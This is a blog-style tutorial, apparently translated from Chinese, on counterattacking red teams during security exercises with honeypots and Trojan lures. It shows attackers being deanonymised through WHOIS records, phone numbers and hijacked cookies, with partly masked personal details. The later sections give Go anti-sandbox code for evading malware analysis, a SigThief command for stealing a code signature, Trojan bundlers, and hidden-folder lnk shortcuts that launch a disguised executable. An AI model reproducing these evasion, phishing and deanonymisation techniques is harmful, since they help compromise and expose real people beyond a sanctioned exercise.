Traceability and countermeasures – self-built honeypots to counterattack attack teams

Foreword

This article summarizes some blue-team experience from recent PS exercises and earlier cases. I hope it helps with the blue team’s traceability score; if you have other tricks, please share them.

Traceability and countermeasures are a perennial topic: a contest between the red and blue sides in which even professional red teams slip up sometimes. The reasons can be roughly summarized as follows:

  • The machines provided for the exercise are too slow, and working through a virtual machine hurts efficiency, so an impatient operator works directly on the host machine.

  • The red team has poor operating habits: it does not use clean virtual machines, and the machines hold identity files or other information that can be traced.

  • “Most of the people who drown are people who can swim.” Because they are experienced, they underestimate the opponent and assume they will not make mistakes.

  • Inaccurate identification of honeypots: not using incognito mode or a honeypot-identification plug-in, and even sharing honeypots with teammates as results.

The general process of countermeasures

Honeypot deployment

Deploy a high-fidelity virtual environment. Some things to pay attention to:

  • The deployed honeypots must be reported to the referee in advance to avoid later disputes, and they must be isolated on their own segment to prevent lateral movement.

  • The honeypot should not look too fake. For example, if several ports expose different web services, the system should give the attacker the illusion of having achieved results through their own effort.

If you use some vendor’s cloud honeypot directly, its fingerprint is very obvious and it is easily tagged as a honeypot on the asset-mapping (cyberspace search) platforms; its built-in countermeasure function is useless and its trigger conditions are very demanding.

This time I reused a Zhiyuan OA environment that had previously served for vulnerability debugging. Since the attack side includes student teams, the environment keeps an n-day vulnerability so that a one-click getshell tool can be used directly for post-exploitation.

To import the image to the cloud server, you need to download the driver from the following address, install it, and then export the image; otherwise the import on the cloud server will fail.

https://cloud.tencent.com/document/product/213/17815

Once it is up, point a domain name at the IP. It is best to choose a hostname from a common subdomain dictionary, such as demo or crm, so that subdomain scanners will find it.

In addition, you can configure the WAF’s custom redirect page to point to the honeypot address, so that asset-mapping platforms such as FOFA and Hunter index it faster.

With the honeypot deployed, the next step is to choose the lure for delivering the Trojan. The file can pose as a password list, an internal VPN client, the company address book, or anything else that attracts attackers.

This time I chose to disguise it as the internal VPN client, with accompanying documentation to increase credibility and the click-through rate.

Since when the attack team will click on the lure is unpredictable, set up an online (check-in) alert so that you can counterattack in time. For details, see https://xz.aliyun.com/t/10698
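As an added example, not from the original article or the linked post, this is the server side of such an alert in Go: one notification per source IP per quiet window, and the client address read correctly whether or not the beacon URL sits behind the WAF mentioned above. Beacon, Window, Notify and the X-Forwarded-For handling are assumptions; Record and ClientIP are meant to be called from the handler that serves the beacon URL.

```go
package main

import (
	"net"
	"net/http"
	"strings"
	"sync"
	"time"
)

type Alert struct {
	IP, UserAgent, Lure string
}

// Beacon raises one Alert per source IP per quiet window, so repeated opens of the
// lure by the same attacker do not flood the on-duty channel behind Notify.
type Beacon struct {
	mu     sync.Mutex
	last   map[string]time.Time
	Window time.Duration
	Notify func(Alert) // e.g. an IM webhook or SMS gateway client (assumed)
}

// Record is called from the beacon URL's handler; true means a notification went out.
func (b *Beacon) Record(ip, ua, lure string, now time.Time) bool {
	b.mu.Lock()
	defer b.mu.Unlock()
	if t, ok := b.last[ip]; ok && now.Sub(t) < b.Window {
		return false
	}
	if b.last == nil {
		b.last = map[string]time.Time{}
	}
	b.last[ip] = now
	b.Notify(Alert{IP: ip, UserAgent: ua, Lure: lure})
	return true
}

// ClientIP trusts X-Forwarded-For only when the honeypot sits behind the WAF or
// reverse proxy; otherwise every hit would be attributed to the proxy's own address.
func ClientIP(r *http.Request, behindProxy bool) string {
	if xff := r.Header.Get("X-Forwarded-For"); behindProxy && xff != "" {
		hops := strings.Split(xff, ",") // earlier hops are attacker-supplied; keep ours
		return strings.TrimSpace(hops[len(hops)-1])
	}
	if host, _, err := net.SplitHostPort(r.RemoteAddr); err == nil {
		return host
	}
	return r.RemoteAddr
}
```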

Now wait for good news, that is, for the attacker to take the bait. This is Jiang Taigong fishing: the willing take the hook.

Tracing back to the source

General traceability

The traceability scoring rules require cross-corroborating evidence and proof that the attacker has offensive security capability. Attacker IPs can be collected from the situational-awareness platform or the firewall.

After deduplicating the IPs, fingerprint the assets behind them, such as security blogs and scanners; tracing from these assets is more efficient. EHole is recommended for this.

https://github.com/EdgeSecurityTeam/EHole
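As an added example, not from the original article, here is the deduplication step in Go, run over a constructed firewall export (the src=/dst= layout is assumed, not a real product’s format). It drops internal addresses and ranks the remaining sources by how many distinct targets they touched, so the widest scanners are fingerprinted first.

```go
package main

import (
	"net"
	"regexp"
	"sort"
	"strings"
)

// Constructed sample export (not a real product's log format): "src=<ip> dst=<host:port>".
const sampleLogs = `2023-08-15T22:01:03 src=203.0.113.7 dst=10.0.5.12:8080 action=scan
2023-08-15T22:01:04 src=203.0.113.7 dst=10.0.5.12:8443 action=scan
2023-08-15T22:03:11 src=198.51.100.23 dst=10.0.5.12:80 action=block
2023-08-15T22:03:40 src=10.0.7.9 dst=10.0.5.12:445 action=allow
2023-08-15T22:05:02 src=198.51.100.23 dst=10.0.5.12:80 action=block`

// Source is a deduplicated external address and the number of distinct dst host:port it touched.
type Source struct {
	IP      string
	Targets int
}

var srcRe = regexp.MustCompile(`src=(\S+)\s+dst=(\S+)`)

// RankSources deduplicates source IPs, drops private/loopback addresses (internal
// monitoring noise, not attacker candidates) and ranks the rest widest first.
func RankSources(logs string) []Source {
	dsts := map[string]map[string]bool{} // src -> set of dst host:port
	for _, line := range strings.Split(logs, "\n") {
		m := srcRe.FindStringSubmatch(line)
		if m == nil {
			continue
		}
		if ip := net.ParseIP(m[1]); ip == nil || ip.IsPrivate() || ip.IsLoopback() {
			continue
		}
		if dsts[m[1]] == nil {
			dsts[m[1]] = map[string]bool{}
		}
		dsts[m[1]][m[2]] = true
	}
	var out []Source
	for src, d := range dsts {
		out = append(out, Source{IP: src, Targets: len(d)})
	}
	sort.Slice(out, func(i, j int) bool { // widest first, then IP for a stable order
		return out[i].Targets > out[j].Targets || out[i].Targets == out[j].Targets && out[i].IP < out[j].IP
	})
	return out
}
```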

For example, a port scan of the IP revealed that it was hosting a Lighthouse (ARL) asset-reconnaissance system.

The situational-awareness platform also showed that this IP had scanned us recently, so it is very likely an attack-team IP.

Querying the IP on Weibu (ThreatBook) shows that it is bound to a domain name, and domestic domain names require real-name registration.

From the domain name’s WHOIS information we obtain the attacker’s name, Shen xx, and QQ email address: [email protected]

Counter attack team member 1

This case comes from a recent PS exercise. Late on a quiet night, just as I was packing up to leave work, the online alert suddenly went off, and I was no longer sleepy.

During the countermeasure things move fast and important details are easily missed, so it is recommended to record the screen while operating.

From the screen-recording files on the machine we inferred that it belonged to a member of the on-site attack team. However, the video was too large to copy as evidence, so we had to find another way to confirm which attack team it was.

The attacker had good operating habits and used a virtual machine. I searched through folders for a long time without finding any file related to personal information. Just when I was at a loss, I found this entry in the browser history:

The username turned out to be a mobile phone number. At first I thought it was just an ordinary attack result and paid no attention, but a Baidu search showed it was a Wenzhou, Zhejiang number, which obviously did not match this HW exercise, so I guessed it was the attacker’s own phone.

So I looked up the personal information behind the phone number and got the name Chen xx, who had studied at Zhejiang xxxx school. Searching the keywords with Google dorks, I located his employer, xx Information Company.

The attack-team member’s identity was then double-checked against the internal address book, which confirmed him as laboratory staff there. With everything consistent, the job was done.

Interlude: the account and password of the Lighthouse system were also obtained from the browser history. The attack team should be grateful that I did not delete their tasks, haha.

Counter Attack Team Member 2

Another lucky player accidentally stepped on the trap, and on the machine I found a cookie and a token.

After substituting the cookie in Burp, I obtained the attacker’s Baidu ID.

Then I searched the Internet for information related to that name, found a technical blog he had set up, and obtained his real name, Wu xx.

His identity was further confirmed by the CISP-PTE exam information on the machine.

Counter attack team member 3

Out of the blue, a WeChat friend request arrived. I had only been watching from the sidelines, but I knew at a glance that it was an attack team phishing over WeChat, so I played along with their act.

Here a phone hotspot and a virtual machine were used to simulate a personal terminal. I ran the attack team’s Trojan and placed the counter-phishing file, named “xx Blue Team Information Table”, on the desktop.

An lnk file is used here; how to build one is covered in the lnk section below. To prevent the contents from being previewed when the archive is opened, the archive must be a password-protected rar.

That way only a single lnk file appears after extraction. In the late, tiring stage of HW the attack team easily lets its guard down and pays no attention, and in the end their machine came online.

Technical means involved

Trojan anti-killing (AV evasion)

To counterattack the attack team, the first thing you need is a durable Trojan that survives antivirus and can both hold out and strike.

Shamelessly taking the opportunity to advertise: after getting past the “three musketeers” of domestic antivirus, adding anti-sandbox code gets a green result on Weibu (ThreatBook) and under 10 detections on VirusTotal.

My own humble project: https://github.com/Pizz33/GobypassAV-shellcode

Good brother Wang Chaogong’s project: https://github.com/wangfly-me/SysHttpHookSleep

Anti-Sandbox

There are many traditional anti-sandbox checks, such as boot time, memory size, and mouse movement and clicks. Here are two more practical ones; the rest you can explore on your own.

Check the number of desktop files

package main

import (
	"fmt"
	"os"
	"path/filepath"
)

// desktop exits if the user's Desktop holds fewer than 10 entries, on the
// assumption that a freshly provisioned analysis sandbox has an almost empty desktop.
func desktop() {
	homePath, err := os.UserHomeDir()
	if err != nil {
		fmt.Println("Unable to obtain user home path:", err)
		return
	}

	desktopFiles, err := os.ReadDir(filepath.Join(homePath, "Desktop"))
	if err != nil {
		fmt.Println("Unable to read user desktop file list:", err)
		return
	}

	fileCount := len(desktopFiles)
	fmt.Println("Number of user desktop files:", fileCount)

	if fileCount < 10 {
		os.Exit(0)
	}
}

Check whether the running process name matches the executable name

package main

import (
	"os"
	"path/filepath"
	"strings"
)

// process exits if the name the program was launched under differs from the name
// of the executable on disk, which happens when a sandbox renames or wraps the sample.
func process() {
	executablePath, err := os.Executable()
	if err != nil {
		// Handle the error
		return
	}

	sourceFilename := filepath.Base(executablePath) // file name of the executable on disk
	processName := filepath.Base(os.Args[0])        // name the current process was started with

	// Compare the two names, ignoring case
	if strings.EqualFold(sourceFilename, processName) {
		// Names match: running normally
		// Perform normal operations here
	} else {
		// Names differ: possibly running inside a sandbox environment
		// Perform the corresponding anti-sandbox operations here
		os.Exit(0) // exit the program
	}
}

Resource replacement

After AV evasion is done, the file still needs to be disguised as a normal program. The icon and the signature are very important and can to some extent avoid 360’s QVM detection.

https://github.com/secretsquirrel/SigThief

python sigthief.py -i 360Safe.exe -t notepad.exe -o tes.exe


Digital signature tool: TrustAsia (Asia Integrity) code-signing tool, Professional Edition

GitHub – JarlPenguin/BeCyIconGrabberPortable: BeCyIconGrabber allows you to extract icons from almost any file (icon extraction)

Icon replacement

Resource Hacker

Trojan bundler

During the countermeasure, if nothing visible happens after the attacker runs the file, it arouses suspicion. A prepared normal file therefore needs to be dropped alongside to lower the other side’s guard.

https://github.com/H4de5-7/Bundler-bypass

Import the normal file and the Trojan, then compile and generate.

https://github.com/Yihsiwei/GoFileBinder

Pitfalls:

1. In the command, the exe must be placed before the file to be dropped. The order cannot be changed, otherwise the generated file will not drop it properly.

2. The Go version used is 1.17; testing found that 1.18 fails to generate.

lnk file production

The structure of the phishing sample is as follows: the opened folder contains a shortcut and a hidden folder. The hidden folder has several levels of directories, and the real Trojan file is placed in the last level.

The real Trojan sits in the MACOS folder, which is set hidden. Of the two attrib commands below, the first sets the system, hidden and read-only attributes and the second clears them again.

attrib +s +h +r C:\Users\Public\xxx.exe
attrib -s -h -r C:\Users\Public\xxx.exe

The shortcut in the root directory has its Target property modified so that a relative path points to the real Trojan, either opening the decoy document first and then the executable, or launching the executable alone:

%windir%\system32\cmd.exe /c start .\.__MACOS__\.__MACOS__\.__MACOS__\.__MACOS1__\xxx.doc && C:\Windows\explorer.exe ".\.__MACOS__\.__MACOS__\.__MACOS__\.__MACOS1__\xxx.exe"
C:\Windows\explorer.exe ".\.__MACOS__\.__MACOS__\.__MACOS__\.__MACOS1__\xxx.exe"